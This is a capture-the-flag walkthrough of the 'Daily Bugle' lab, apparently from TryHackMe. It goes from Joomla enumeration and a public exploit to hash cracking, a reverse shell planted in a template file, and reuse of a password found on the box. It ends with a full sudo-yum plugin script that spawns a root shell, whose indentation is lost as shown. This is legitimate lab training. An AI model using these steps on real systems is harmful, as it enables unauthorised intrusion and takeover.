Daily Bugle
https://tryhackme.com/room/dailybugle
User Flag
As usual let's start with port scanning.
We see there are three open ports (22, 80, 3306). Let's head to port 80.
We see there's a simple website that uses joomla. Let's check the robots.txt and see if we find something interesting.
Nothing interesting at the moment. We can use dirseach to see if there's something hidden.
Checking the README.txt file we find the joomla version.
Let's check if there's any known exploit.
After a while looking for the right exploit we decided to use this one:
After running the exploit with get some credentials.
We can use hashcat to crack the hash we found.
After that we can try to login to the admin site.
Once inside the joomla administration page we can sucessfully upload a reverse shell and get over the victim machine. We can do that following these steps:
Templates > Templates > Protostar Details and Files
Now we can edit the index.php file and add our reverse shell.
After saving the file we just have to refresh the site. Don't forget to start a listener.
We're inside. Let's see if we can get the flag.
No luck. If we take a look around the machine we see there's a configuration.php file in /var/www/html. If you read it you'll find a password.
We can se the found password to log in with jjameson and grab the flag.
Root Flag
Let's run sudo -l to see if we have sudo perms.
We can run yum as a privileged user. Taking a look at gtfobins.github.io we can gain root privilege following these steps:
TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF
cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF
cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
os.execl('/bin/sh','/bin/sh')
EOF
sudo yum -c $TF/x --enableplugin=yLet's do that and grab the flag.
Last updated
Was this helpful?